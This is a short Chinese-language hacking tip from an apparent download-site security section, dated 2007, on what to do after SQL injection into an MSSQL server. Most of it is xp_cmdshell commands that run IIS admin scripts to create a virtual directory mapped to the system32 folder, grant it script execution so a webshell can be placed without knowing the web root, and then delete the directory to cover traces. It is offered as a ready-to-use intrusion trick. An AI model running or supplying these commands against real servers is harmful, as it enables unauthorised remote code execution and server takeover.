SQL注入建立虚拟目录，免得找Web绝对路径！

| 网站首页 | 模板 | 资料 | 源码 | 工具 | 开发 | 设计 | 安全 | 项目 | 网络 | 图片 | 系统 | 数据库 | 博客 | 会员中心 | 小说 |

网络学院

学习资料

源码模版

您现在的位置：精品下载 >> 安全 >> 网络安全 >> 安全中心正文

用户登录

新用户注册

SQL注入建立虚拟目录，免得找Web绝对路径！

【字体：小大】

SQL注入建立虚拟目录，免得找Web绝对路径！

作者：佚名安全中心来源：不详点击数：更新时间：2007-10-10

我们很多情况下都遇到SQL注入可以列目录和运行命令，但是却很不容易找到web所在目录，也就不好得到一个webshell，这一招不错：

exec master.dbo.xp_cmdshell 'cscript C:/Interpub/AdminScripts/mkwebdir.vbs -c localhost -w "l" -v "win","c:/winnt/system32"'
建立虚拟目录win,指向c:/winnt/system32
exec master.dbo.xp_cmdshell 'cscript C:/Interpub/AdminScripts/adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
让win句有解析asp脚本权限

exec master.dbo.xp_cmdshell "cscript C:/Interpub/AdminScripts/adsutil.vbs delete w3svc/1/root/h4x0r/"
删除虚拟目录。
找不到web绝对路径的一种解决办法，

http://21o.net/h4x0r
403错误，表示虚拟目录建好了。。。

安全中心录入：chqnet 责任编辑：chqnet

上一个安全中心：推荐:Linux下由论坛到SSH的入侵

下一个安全中心： M$ 讲师对Rootkit的介绍

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关安全中心
				给WIN2003 IIS SQL服务器安全… URL编码与SQL注入黑客经验谈 MSSQLSA权限入侵… 简单学习理解掌握SQL注入技术带注释手动SQL注入脚本命令总… 在SQL Server计算机上运行病… MySQL Server date_format()… Oracle 10g DBMS_EXPORT_EXT… Oracle数据库SYS.DBMS_CDC_I… Oracle数据库SYS.DBMS_STATS…

　网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）